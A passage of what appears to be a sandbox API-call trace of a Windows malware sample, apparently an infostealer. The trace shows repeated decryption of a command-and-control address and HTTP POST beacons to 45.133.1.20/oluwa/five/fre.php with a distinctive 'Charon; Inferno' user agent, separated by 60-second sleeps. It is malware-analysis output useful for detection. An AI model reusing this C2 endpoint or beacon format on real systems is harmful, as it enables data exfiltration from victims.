buf=0x6bb998*, len=159, flags=0) returned 159 [0263.558] GetProcessHeap () returned 0x6a0000 [0263.558] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d9718 [0263.558] recv (in: s=0x914, buf=0x6d9718, len=4048, flags=0 | out: buf=0x6d9718*) returned 204 [0263.634] GetProcessHeap () returned 0x6a0000 [0263.634] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0263.634] GetProcessHeap () returned 0x6a0000 [0263.634] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0263.635] GetProcessHeap () returned 0x6a0000 [0263.635] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba5f0 | out: hHeap=0x6a0000) returned 1 [0263.635] GetProcessHeap () returned 0x6a0000 [0263.635] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6befd0 | out: hHeap=0x6a0000) returned 1 [0263.636] closesocket (s=0x914) returned 0 [0263.637] GetProcessHeap () returned 0x6a0000 [0263.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa50 | out: hHeap=0x6a0000) returned 1 [0263.637] GetProcessHeap () returned 0x6a0000 [0263.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0263.637] GetProcessHeap () returned 0x6a0000 [0263.639] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0263.639] GetProcessHeap () returned 0x6a0000 [0263.639] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0263.645] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d9718, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1680) returned 0x914 [0263.647] Sleep (dwMilliseconds=0xea60) [0263.651] GetProcessHeap () returned 0x6a0000 [0263.651] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0263.652] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.653] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0263.663] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.664] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0263.680] GetProcessHeap () returned 0x6a0000 [0263.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0263.681] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.681] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0263.682] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.685] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0263.686] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.686] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0263.686] GetProcessHeap () returned 0x6a0000 [0263.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0263.688] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.688] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0263.689] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.690] CryptDestroyKey (hKey=0x6ad020) returned 1 [0263.690] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.691] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0263.691] GetProcessHeap () returned 0x6a0000 [0263.691] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0263.692] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0263.692] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0263.693] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0263.696] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0263.697] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0263.698] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0263.699] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0263.699] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0263.699] GetProcessHeap () returned 0x6a0000 [0263.699] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0263.699] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0263.700] GetProcessHeap () returned 0x6a0000 [0263.700] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0263.701] GetProcessHeap () returned 0x6a0000 [0263.701] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0263.701] GetProcessHeap () returned 0x6a0000 [0263.701] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0263.701] GetProcessHeap () returned 0x6a0000 [0263.701] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0263.702] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.703] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0263.711] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.712] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0263.719] GetProcessHeap () returned 0x6a0000 [0263.719] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0263.720] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.721] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0263.722] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.722] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0263.724] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.724] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0263.724] GetProcessHeap () returned 0x6a0000 [0263.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0263.726] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.729] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0263.730] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.730] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0263.731] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.731] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0263.731] GetProcessHeap () returned 0x6a0000 [0263.731] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0263.732] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0263.732] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0263.733] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0263.734] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0263.734] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0263.735] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0263.736] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0263.736] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0263.736] GetProcessHeap () returned 0x6a0000 [0263.736] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0263.736] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0263.736] GetProcessHeap () returned 0x6a0000 [0263.736] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baab0 [0263.736] socket (af=2, type=1, protocol=6) returned 0x918 [0263.737] connect (s=0x918, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0263.768] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0263.768] GetProcessHeap () returned 0x6a0000 [0263.768] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0263.768] GetProcessHeap () returned 0x6a0000 [0263.768] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0263.769] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0263.770] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0263.770] GetProcessHeap () returned 0x6a0000 [0263.770] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba0b0 [0263.770] GetProcessHeap () returned 0x6a0000 [0263.770] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0263.770] GetProcessHeap () returned 0x6a0000 [0263.770] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0263.770] GetProcessHeap () returned 0x6a0000 [0263.770] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0263.771] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0263.773] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0263.773] GetProcessHeap () returned 0x6a0000 [0263.773] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0263.773] GetProcessHeap () returned 0x6a0000 [0263.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0263.773] send (s=0x918, buf=0x6bd460*, len=242, flags=0) returned 242 [0263.774] send (s=0x918, buf=0x6bb998*, len=159, flags=0) returned 159 [0263.774] GetProcessHeap () returned 0x6a0000 [0263.774] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d9718 [0263.774] recv (in: s=0x918, buf=0x6d9718, len=4048, flags=0 | out: buf=0x6d9718*) returned 204 [0263.842] GetProcessHeap () returned 0x6a0000 [0263.842] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0263.842] GetProcessHeap () returned 0x6a0000 [0263.843] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0263.843] GetProcessHeap () returned 0x6a0000 [0263.843] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba0b0 | out: hHeap=0x6a0000) returned 1 [0263.843] GetProcessHeap () returned 0x6a0000 [0263.843] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0263.844] closesocket (s=0x918) returned 0 [0263.845] GetProcessHeap () returned 0x6a0000 [0263.845] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baab0 | out: hHeap=0x6a0000) returned 1 [0263.845] GetProcessHeap () returned 0x6a0000 [0263.845] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0263.845] GetProcessHeap () returned 0x6a0000 [0263.845] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0263.846] GetProcessHeap () returned 0x6a0000 [0263.846] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0263.846] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d9718, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1688) returned 0x918 [0263.853] Sleep (dwMilliseconds=0xea60) [0263.855] GetProcessHeap () returned 0x6a0000 [0263.855] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0263.856] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.857] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0263.865] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.865] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0263.874] GetProcessHeap () returned 0x6a0000 [0263.874] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0263.875] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.875] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0263.876] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.876] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0263.877] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.877] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0263.877] GetProcessHeap () returned 0x6a0000 [0263.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0263.884] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.885] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0263.886] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.886] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0263.887] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.887] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0263.887] GetProcessHeap () returned 0x6a0000 [0263.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0263.889] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0263.889] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0263.890] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0263.891] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0263.891] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0263.892] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0263.896] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0263.896] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0263.896] GetProcessHeap () returned 0x6a0000 [0263.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0263.896] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0263.896] GetProcessHeap () returned 0x6a0000 [0263.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0263.897] GetProcessHeap () returned 0x6a0000 [0263.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0263.897] GetProcessHeap () returned 0x6a0000 [0263.898] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0263.898] GetProcessHeap () returned 0x6a0000 [0263.898] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0263.899] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.900] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0263.912] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.913] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0263.923] GetProcessHeap () returned 0x6a0000 [0263.923] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0263.924] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.924] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad520) returned 1 [0263.925] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.926] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0263.926] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.927] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0263.927] GetProcessHeap () returned 0x6a0000 [0263.927] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0263.928] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.929] CryptDecrypt (in: hKey=0x6ad520, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0263.930] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.930] CryptDestroyKey (hKey=0x6ad520) returned 1 [0263.931] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.931] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0263.931] GetProcessHeap () returned 0x6a0000 [0263.931] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0263.932] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0263.933] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0263.933] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0263.934] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0263.934] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0263.935] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0263.936] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0263.936] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0263.936] GetProcessHeap () returned 0x6a0000 [0263.936] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0263.936] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0263.936] GetProcessHeap () returned 0x6a0000 [0263.936] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba990 [0263.936] socket (af=2, type=1, protocol=6) returned 0x91c [0263.939] connect (s=0x91c, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0263.968] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0263.968] GetProcessHeap () returned 0x6a0000 [0263.968] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0263.968] GetProcessHeap () returned 0x6a0000 [0263.968] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d8f10 [0263.969] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0263.970] wvsprintfA (in: param_1=0x6d8f10, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0263.970] GetProcessHeap () returned 0x6a0000 [0263.970] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba170 [0263.970] GetProcessHeap () returned 0x6a0000 [0263.970] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 [0263.971] GetProcessHeap () returned 0x6a0000 [0263.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0263.971] GetProcessHeap () returned 0x6a0000 [0263.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d8f10 [0263.972] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0263.973] wvsprintfA (in: param_1=0x6d8f10, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0263.973] GetProcessHeap () returned 0x6a0000 [0263.973] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0263.973] GetProcessHeap () returned 0x6a0000 [0263.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f10 | out: hHeap=0x6a0000) returned 1 [0263.974] send (s=0x91c, buf=0x6bd460*, len=242, flags=0) returned 242 [0263.974] send (s=0x91c, buf=0x6bb998*, len=159, flags=0) returned 159 [0263.974] GetProcessHeap () returned 0x6a0000 [0263.975] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d8f10 [0263.975] recv (in: s=0x91c, buf=0x6d8f10, len=4048, flags=0 | out: buf=0x6d8f10*) returned 204 [0264.053] GetProcessHeap () returned 0x6a0000 [0264.054] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0264.054] GetProcessHeap () returned 0x6a0000 [0264.054] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0264.055] GetProcessHeap () returned 0x6a0000 [0264.056] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba170 | out: hHeap=0x6a0000) returned 1 [0264.056] GetProcessHeap () returned 0x6a0000 [0264.056] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: 